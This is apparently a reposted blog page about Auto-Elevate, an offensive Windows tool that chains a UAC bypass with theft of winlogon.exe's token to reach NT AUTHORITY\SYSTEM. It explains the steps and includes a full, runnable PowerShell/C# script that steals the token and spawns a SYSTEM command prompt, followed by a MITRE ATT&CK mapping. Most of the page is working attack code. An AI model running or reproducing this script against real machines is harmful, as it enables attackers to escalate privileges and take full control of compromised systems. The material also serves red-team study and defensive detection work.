Linchakin

Auto-Elevate - Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\SYSTEM Without An LPE Exploit By Combining A COM UAC Bypass And Tok...

 April 01, 2022

This tool demonstrates the power of UAC bypasses combined with built-in Windows features. The utility locates winlogon.exe, steals and impersonates its process token, and spawns a new SYSTEM-level process with the stolen token. Combined with UAC bypass method #41 (the ICMLuaUtil UAC bypass) from hfiref0x's UACME utility, it can auto-elevate a low-privileged (non-elevated, UAC-filtered) administrator account to NT AUTHORITY\SYSTEM. Note that no LPE exploit is involved: the UAC bypass only turns the filtered administrator token into a full, high-integrity one, and the token theft from winlogon.exe is what crosses from Administrator to SYSTEM.

The following image demonstrates using UACME combined with Auto-Elevate to go from a low-privileged Administrator account to NT AUTHORITY\SYSTEM on Windows 10 21H1.

The following image demonstrates escalation from a high-privileged Administrator account to SYSTEM without a UAC bypass

Technical Explanation

The following steps are performed by Auto-Elevate, running in a high-integrity (elevated) administrator context, i.e. after the UAC bypass, to escalate to SYSTEM:

Auto-Elevate

  1. winlogon.exe is located by enumerating the system's running processes with CreateToolhelp32Snapshot, Process32First and Process32Next.
  2. SeDebugPrivilege is enabled for the current process with AdjustTokenPrivileges; it is required to open a handle to winlogon.exe, which runs as SYSTEM in another session. Note that AdjustTokenPrivileges returns success even when the privilege is not held, so GetLastError must be checked for ERROR_NOT_ALL_ASSIGNED.
  3. A handle to the winlogon.exe process is opened with OpenProcess. PROCESS_ALL_ACCESS is requested, which is more than needed: OpenProcessToken only requires PROCESS_QUERY_LIMITED_INFORMATION.
  4. A handle to winlogon's primary token is retrieved by calling OpenProcessToken on that process handle.
  5. winlogon's user (SYSTEM) is impersonated by passing the token to ImpersonateLoggedOnUser.
  6. The token is duplicated with DuplicateTokenEx at the SecurityImpersonation level. The duplicate must be a primary token (TokenPrimary), because CreateProcessWithTokenW does not accept impersonation tokens.
  7. A new cmd.exe instance is spawned with the duplicated token by calling CreateProcessWithTokenW. This call requires SeImpersonatePrivilege in the caller's token, which an elevated administrator has and a UAC-filtered one does not; this is why the UAC bypass has to come first.
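The seven steps above as one runnable script. This is an added example, not Auto-Elevate's own code: a PowerShell wrapper that loads a small C# P/Invoke helper with Add-Type. The class name TokenSteal and the function SpawnWithTokenOf are hypothetical, Process.GetProcessesByName stands in for the Toolhelp32 enumeration in step 1, and the script assumes it is started from an elevated (high-integrity) administrator prompt such as the cmd.exe that the ICMLuaUtil bypass provides.

```powershell
# Added example (not Auto-Elevate's own code): token theft from winlogon.exe via Add-Type/P/Invoke.
# Assumes an elevated administrator prompt (SeDebugPrivilege available, SeImpersonatePrivilege held).
$src = @'
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;

public static class TokenSteal
{
    const uint TOKEN_QUERY = 0x0008, TOKEN_ADJUST_PRIVILEGES = 0x0020, TOKEN_DUPLICATE = 0x0002;
    const uint SE_PRIVILEGE_ENABLED = 0x0002, PROCESS_QUERY_LIMITED_INFORMATION = 0x1000;
    const uint MAXIMUM_ALLOWED = 0x02000000, CREATE_NEW_CONSOLE = 0x00000010;
    const int SecurityImpersonation = 2, TokenPrimary = 1, ERROR_NOT_ALL_ASSIGNED = 1300;

    [StructLayout(LayoutKind.Sequential)] struct LUID { public uint LowPart; public int HighPart; }
    // TOKEN_PRIVILEGES with a single LUID_AND_ATTRIBUTES entry, flattened into one struct.
    [StructLayout(LayoutKind.Sequential)] struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO { public int cb; public string lpReserved, lpDesktop, lpTitle; public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags; public short wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError; }
    [StructLayout(LayoutKind.Sequential)] struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }

    [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool ImpersonateLoggedOnUser(IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool RevertToSelf();
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs, int level, int type, out IntPtr dup);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] static extern bool CreateProcessWithTokenW(IntPtr token, uint logonFlags, string app, string cmdLine, uint flags, IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);

    static void Check(bool ok, string what) { if (!ok) throw new Win32Exception(Marshal.GetLastWin32Error(), what + " failed"); }

    // Step 2: enable a privilege on our own token. AdjustTokenPrivileges returns TRUE even when the
    // privilege is not held by the token, so the last-error value has to be checked as well.
    static void EnablePrivilege(string name)
    {
        IntPtr hTok;
        Check(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hTok), "OpenProcessToken(self)");
        try {
            TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES { PrivilegeCount = 1, Attributes = SE_PRIVILEGE_ENABLED };
            Check(LookupPrivilegeValue(null, name, out tp.Luid), "LookupPrivilegeValue");
            Check(AdjustTokenPrivileges(hTok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero), "AdjustTokenPrivileges");
            if (Marshal.GetLastWin32Error() == ERROR_NOT_ALL_ASSIGNED) throw new Win32Exception(ERROR_NOT_ALL_ASSIGNED, name + " is not held by this token (not elevated?)");
        } finally { CloseHandle(hTok); }
    }

    // Returns the PID of a new process created under the token of sourceProcess (e.g. "winlogon").
    public static int SpawnWithTokenOf(string sourceProcess, string commandLine)
    {
        // Step 1: Process.GetProcessesByName stands in for the Toolhelp32 snapshot loop.
        Process[] found = Process.GetProcessesByName(sourceProcess);
        if (found.Length == 0) throw new InvalidOperationException(sourceProcess + " is not running");
        EnablePrivilege("SeDebugPrivilege");
        // Step 3: the least access OpenProcessToken needs, instead of PROCESS_ALL_ACCESS.
        IntPtr hProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, found[0].Id);
        Check(hProc != IntPtr.Zero, "OpenProcess");
        IntPtr hTok = IntPtr.Zero, hDup = IntPtr.Zero;
        try {
            Check(OpenProcessToken(hProc, TOKEN_QUERY | TOKEN_DUPLICATE, out hTok), "OpenProcessToken");  // Step 4
            Check(ImpersonateLoggedOnUser(hTok), "ImpersonateLoggedOnUser");                           // Step 5
            // Step 6: CreateProcessWithTokenW only accepts a primary token, hence TokenPrimary.
            Check(DuplicateTokenEx(hTok, MAXIMUM_ALLOWED, IntPtr.Zero, SecurityImpersonation, TokenPrimary, out hDup), "DuplicateTokenEx");
            RevertToSelf();   // the duplicate is all we need; drop the thread impersonation again
            // Step 7: requires SeImpersonatePrivilege in the calling (elevated administrator) token.
            STARTUPINFO si = new STARTUPINFO(); si.cb = Marshal.SizeOf(typeof(STARTUPINFO));
            PROCESS_INFORMATION pi;
            Check(CreateProcessWithTokenW(hDup, 0, null, commandLine, CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref si, out pi), "CreateProcessWithTokenW");
            CloseHandle(pi.hThread); CloseHandle(pi.hProcess);
            return (int)pi.dwProcessId;
        } finally {
            if (hDup != IntPtr.Zero) CloseHandle(hDup);
            if (hTok != IntPtr.Zero) CloseHandle(hTok);
            CloseHandle(hProc);
        }
    }
}
'@
Add-Type -TypeDefinition $src

$newPid = [TokenSteal]::SpawnWithTokenOf('winlogon', 'C:\Windows\System32\cmd.exe')
"Spawned PID $newPid with winlogon's token; 'whoami' in the new window should print nt authority\system"
```

Running the same script from a non-elevated administrator prompt fails at step 2 with ERROR_NOT_ALL_ASSIGNED (SeDebugPrivilege is stripped from the UAC-filtered token), which is the precise reason the page pairs the token theft with a UAC bypass rather than an LPE exploit.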

To-Do

MITRE ATT&CK Mapping

  • Access Token Manipulation: T1134
  • Access Token Manipulation: Token Impersonation/Theft: T1134.001
  • Access Token Manipulation: Create Process with Token: T1134.002
  • Access Token Manipulation: Make and Impersonate Token: T1134.003
